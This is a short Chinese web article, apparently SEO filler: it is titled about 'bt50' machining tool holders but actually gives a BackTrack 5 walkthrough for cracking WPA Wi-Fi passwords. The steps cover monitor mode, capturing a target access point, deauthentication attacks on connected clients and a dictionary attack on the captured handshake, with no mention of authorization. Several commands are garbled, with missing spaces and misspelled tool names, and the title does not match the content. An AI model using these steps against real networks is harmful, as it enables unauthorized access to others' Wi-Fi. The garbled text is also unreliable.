文章插图
大家好,精选小编来为大家解答以上问题 。bt50刀柄,bt5很多人还不知道,现在让我们一起来看看吧!
1、在虚拟机中打开BT5系统,在BT5中打开终端,用命令检测无线网卡是否存在 。终端输入命令:iwconfig,如果BT5支持的话一般是wlan0 。
2、在BT5中,打开互联网——wicd网络管理器,扫描现有无线网络;
3、选择信号好的无线网络,点击属性查看AP的基本信息 。
【bt5 bt50刀柄】4、打开终端,输入命令:airmon-ngstartwlan0 6,意思是打开第六通道无线网卡WLAN00的监听模式;
5、监控选中的AP:airodump-ng-wNenew-C4-bssidAP的MACmon0,其中MAC是上一步图中圈出的部分 。
6、根据上一步的图,我们可以找到很多Client客户端的MAC地址,从中选择任意一个(最好选择活动的) 。打开一个新的终端,不要关闭之前的终端,你以后会用到的 。在新终端中输入:airplay-ng-011-aAP的MAC-cCP的MACmon0 。
7、其中:-0:表示采用deauth攻击方式,后面是攻击次数;-a后跟AP的mac地址;-c后跟客户端的mac地址;
8、执行一次,看看下图所示的标志WAP握手是否出现在第一个终端中 。如果是的话,恭喜你,你离成功不远了 。如果没有出现,就重复命令(aireplay-ng-0 11-aAP的MAC-cCP的MACmon0)直到出现握手 。
9、破解BT5握手捕获的数据包:
10、输入:aircraft-ng-wpassword.txt-bAP的macnenew.cap 。
11、其中password.txt是我们需要预置的字典文件 。网上有很多字典文件,所以搜搜有 。Nenew.cap是捕获的包文件 。保存后可能是nenew-01.cap 。